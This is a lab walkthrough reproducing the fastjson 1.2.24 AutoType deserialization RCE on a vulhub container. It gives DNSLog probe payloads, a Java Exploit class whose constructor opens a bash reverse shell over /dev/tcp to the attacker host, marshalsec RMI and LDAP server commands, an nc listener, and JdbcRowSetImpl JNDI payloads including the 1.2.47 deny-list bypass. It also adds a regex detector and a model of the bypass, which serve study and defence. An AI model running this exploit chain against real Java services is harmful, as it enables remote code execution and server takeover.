
Fastjson Deserialization Reproduction

Background

fastjson is an open-source Java library from Alibaba for converting between Java objects and JSON strings.

The two common ways to exploit the deserialization are both JNDI injections: one delivers the reference through RMI (Java Remote Method Invocation), the other through LDAP.

fastjson reads the `@type` field (AutoType) to decide which class to instantiate, and while deserializing it calls the setters of that class. `com.sun.rowset.JdbcRowSetImpl` is the gadget: setting `dataSourceName` to an attacker-controlled `rmi://` or `ldap://` URL and then setting `autoCommit` makes the setter call `connect()`, which performs a JNDI lookup on that URL. The JNDI client follows the returned reference, loads the attacker's class from the remote server and instantiates it, so the malicious code in that class runs on the target.

Vulnerability Reproduction

Environment

Target: vulhub fastjson-1.2.24

Target IP: 192.168.20.128

Kali: 192.168.20.129

Run `docker-compose up -d`, then browse to 192.168.20.128:8090.

Vulnerability Detection

DNSLog callback

Send one of the payloads below in a POST request. For these classes fastjson resolves the value of `val` as a hostname during deserialization, so a hit on your DNSLog domain confirms that the backend parses with fastjson, without needing a working RCE chain. The `java.net.URL` variants only trigger a lookup when the object ends up as a map key or inside a `Set`, because it is `URL.hashCode()` that resolves the host; that is why those payloads put the object in key position or in `Set[...]`. Note that several of these payloads are not well-formed JSON; fastjson's parser is more lenient than a strict JSON library, so test each one against the target rather than assuming a standard parser would accept it.

```
{"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}
{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"xxx.dnslog.cn"}}""}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:"aaa"}
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:0
```
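The same `@type` values are what a defender looks for in request bodies. The following is an added example (not part of the original write-up) of detection logic that classifies raw POST bodies as clean, DNS probe, or JNDI gadget. It works on the raw text with regular expressions rather than a JSON parser, precisely because several of the probes above are not well-formed JSON and a parser-based filter would miss them. The sample bodies are constructed from this page's payloads plus one benign request; the class lists are the ones used on this page and are not a complete gadget inventory.

```python
"""Flag fastjson AutoType probes and JNDI gadgets in raw HTTP request bodies."""
import json
import re

# Capture the class name after "@type" straight from the raw text. A JSON parser is deliberately
# not used for this, because several of the DNSLog probes are not well-formed JSON.
AT_TYPE_RE = re.compile(r'"@type"\s*:\s*"([A-Za-z_$][\w$.]*)"')
# JNDI targets passed through JdbcRowSetImpl.dataSourceName
JNDI_URL_RE = re.compile(r'"dataSourceName"\s*:\s*"((?:rmi|ldap)://[^"]+)"', re.IGNORECASE)

# Classes whose deserialization resolves "val" as a hostname: harmless alone, a recon signal.
PROBE_CLASSES = {
    "java.net.Inet4Address", "java.net.Inet6Address",
    "java.net.InetSocketAddress", "java.net.URL",
}
# Gadget that performs a JNDI lookup on an attacker-controlled URL.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}


def is_well_formed_json(body: str) -> bool:
    try:
        json.loads(body)
        return True
    except ValueError:
        return False


def inspect_body(body: str) -> dict:
    """Classify one request body: clean, dns_probe, autotype_present or jndi_gadget."""
    types = AT_TYPE_RE.findall(body)
    jndi_urls = JNDI_URL_RE.findall(body)
    if jndi_urls or GADGET_CLASSES.intersection(types):
        verdict = "jndi_gadget"
    elif PROBE_CLASSES.intersection(types):
        verdict = "dns_probe"
    elif types:
        verdict = "autotype_present"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "types": types,
        "jndi_urls": jndi_urls,
        # "java.lang.Class" ahead of a gadget is the <=1.2.47 deny-list bypass pattern
        "cache_priming": "java.lang.Class" in types,
        "well_formed_json": is_well_formed_json(body),
    }


# Constructed sample bodies: probes and payloads from this write-up plus one benign request.
SAMPLE_BODIES = [
    '{"name":"alice","age":30}',
    '{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}',
    '{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}',
    '{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:"aaa"}',
    '{"a":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://192.168.20.129:8001/Exploit","autoCommit":true}}',
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://192.168.20.129:8002/Exploit","autoCommit":true}}',
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        result = inspect_body(body)
        print(f"{result['verdict']:17} well_formed={result['well_formed_json']!s:5} "
              f"types={result['types']} jndi={result['jndi_urls']}")
```

The `well_formed_json` field is the point of the exercise: three of the six sample bodies fail `json.loads`, so a WAF rule that parses first and inspects second never sees their `@type`.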


RMI method

Approach
  1. The target is the vulhub container on port 8090.
  2. On Kali, start a Python web server and put the compiled exploit class in its directory.
  3. On Kali, start an RMI server on port 8001 (RMI, Remote Method Invocation: host A invokes a method on host B; here the target looks up `Exploit` and is handed a reference pointing at the class hosted on the web server).
  4. On Kali, listen on port 8888 for the reverse shell.

Set up a temporary web server on Kali

python3 -m http.server 9999

Compile the exploit and place it in the web directory

Exploit.java

```java
public class Exploit {
    public Exploit() {
        try {
            // Runtime.exec(String) splits the command on whitespace and does not go through a shell,
            // so a plain "bash -i >& /dev/tcp/..." would hand ">&" to bash as a literal argument.
            // Wrapping it as "bash -c $@|bash 0 <command...>" makes the outer bash expand "$@" to the
            // remaining arguments and pipe them into a second bash, which then parses the redirections.
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.20.129/8888 0>&1");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // The payload lives in the constructor: the JNDI client instantiates the remotely loaded class
    // with its no-argument constructor, so nothing else has to be invoked. main() only exists so the
    // class can be tested locally.
    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
```

Compile it with `javac Exploit.java` to produce `Exploit.class`.

Place the compiled `Exploit.class` in the web directory on Kali.

Listen on port 8888 on Kali

nc -lvvp 8888

Start the RMI server

Use the marshalsec project to start an RMI server that listens on port 8001 and serves a reference to the remote class `Exploit.class` (the marshalsec jar and the compiled `Exploit.class` are kept in the same directory here):

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.20.129:9999/#Exploit" 8001

```
kali@kali2020:~/Common/fastjson$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.20.129:9999/#Exploit" 8001
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
* Opening JRMP listener on 8001
Have connection from /192.168.20.128:49126
Reading message...
Is RMI.lookup call for Exploit 2
Sending remote classloading stub targeting http://192.168.20.129:9999/Exploit.class
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by marshalsec.util.Reflections (file:/home/kali/Common/fastjson/marshalsec-0.0.3-SNAPSHOT-all.jar) to field com.sun.jndi.rmi.registry.ReferenceWrapper.wrappee
WARNING: Please consider reporting this to the maintainers of marshalsec.util.Reflections
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Closing connection
```

The cause seemed to be that the Java version was too high: by default it used the javac 11 I had installed only the day before. I switched to a lower javac version to compile, but still could not get a reverse shell.

After half an afternoon of searching I finally found that it was Kali's Java version: Kali's original Java was Java 11, and after installing Java 8 and starting the RMI service again, it worked.

Reverse shell obtained.

Payload

1.2.24

```json
{
  "a": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.20.129:8001/Exploit",
    "autoCommit": true
  }
}
```

1.2.47

Starting with 1.2.25 fastjson ships an AutoType deny list that rejects `com.sun.` classes, so the payload above fails on patched versions. Versions up to and including 1.2.47 can be bypassed by first deserializing a `java.lang.Class` whose `val` names the gadget: that deserializer loads the class and stores it in fastjson's global class cache, and `checkAutoType` consults the cache before the deny list, so the second object is accepted. On the 1.2.24 target used here both forms work.

```json
{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.20.129:8001/Exploit",
    "autoCommit": true
  }
}
```
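To make the difference between the two payloads concrete, here is an added example (not fastjson's code and not part of the original write-up) that models only the part of fastjson's AutoType check that matters for this bypass: the class cache `TypeUtils.mappings`, the fact that `checkAutoType` looks in that cache before the deny list, and the `java.lang.Class` deserializer caching the class it loads (cache=true up to 1.2.47, cache=false from 1.2.48). The deny list is reduced to the single `com.sun.` prefix, and the real hashing, accept lists and `autoTypeSupport` branches are left out. Feeding both payloads from this page through the model for versions 1.2.24, 1.2.47 and 1.2.48 reproduces which one reaches the gadget where.

```python
"""Simplified model of fastjson's AutoType check, showing why the 1.2.47 payload works."""
import json


class AutoTypeNotSupported(Exception):
    pass


# Stand-in for fastjson's deny list; the real list is stored as hashed prefixes and is far longer,
# but "com.sun." has been on it since the list was introduced in 1.2.25.
DENY_PREFIXES = ("com.sun.",)


def _ver(version: str) -> tuple:
    return tuple(int(x) for x in version.split("."))


class FastjsonModel:
    """Tracks the one piece of state that matters here: the global class cache (TypeUtils.mappings)."""

    def __init__(self, version: str):
        self.version = _ver(version)
        self.mappings = set()
        self.accepted = []  # @type names that passed the check and would be instantiated

    def load_class(self, name: str, cache: bool) -> None:
        # TypeUtils.loadClass(name, loader, cache): with cache=True the class is remembered in mappings
        if cache:
            self.mappings.add(name)

    def check_auto_type(self, name: str) -> str:
        if self.version < _ver("1.2.25"):
            return name  # no deny list yet: every @type is honoured
        # 1.2.25 .. 1.2.47 (autoTypeSupport off, the default): a class already present in the
        # mappings cache is returned before the deny list is consulted.
        if name in self.mappings:
            return name
        if name.startswith(DENY_PREFIXES):
            raise AutoTypeNotSupported(name)
        return name

    def parse(self, node) -> None:
        """Walk the document in key order, as JSON.parse does."""
        if isinstance(node, dict):
            type_name = node.get("@type")
            if type_name == "java.lang.Class":
                # MiscCodec deserializes java.lang.Class by loading the class named in "val".
                # Up to 1.2.47 it did so with cache=True; 1.2.48 changed that to cache=False.
                self.load_class(node.get("val", ""), cache=self.version < _ver("1.2.48"))
            elif type_name is not None:
                self.accepted.append(self.check_auto_type(type_name))
            for value in node.values():
                self.parse(value)
        elif isinstance(node, list):
            for value in node:
                self.parse(value)


def reaches_gadget(payload: str, version: str, gadget: str = "com.sun.rowset.JdbcRowSetImpl") -> bool:
    """True if parsing payload under the given fastjson version would instantiate the gadget class."""
    model = FastjsonModel(version)
    try:
        model.parse(json.loads(payload))
    except AutoTypeNotSupported:
        return False
    return gadget in model.accepted


# The two payloads from this page
PAYLOAD_1224 = ('{"a":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                '"dataSourceName":"rmi://192.168.20.129:8001/Exploit","autoCommit":true}}')
PAYLOAD_1247 = ('{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
                '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                '"dataSourceName":"rmi://192.168.20.129:8001/Exploit","autoCommit":true}}')

if __name__ == "__main__":
    for version in ("1.2.24", "1.2.47", "1.2.48"):
        print(f"{version}: plain payload -> {reaches_gadget(PAYLOAD_1224, version)}, "
              f"java.lang.Class payload -> {reaches_gadget(PAYLOAD_1247, version)}")
```

The ordering is what makes key order in the payload matter: if `"b"` came before `"a"`, the deny list would fire before the cache was primed.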

LDAP method

Same flow as RMI, but marshalsec serves the reference over LDAP on port 8002 and the payload points `dataSourceName` at an `ldap://` URL. Which of the two works depends on the target JDK rather than on fastjson: loading classes from a remote codebase through RMI references is disabled by default since JDK 8u121 (`com.sun.jndi.rmi.object.trustURLCodebase=false`) and through LDAP since 8u191 (`com.sun.jndi.ldap.object.trustURLCodebase=false`), so on targets between those two versions only the LDAP variant succeeds.

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.20.129:9999/#Exploit" 8002

```json
{
  "a": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://192.168.20.129:8002/Exploit",
    "autoCommit": true
  }
}
```

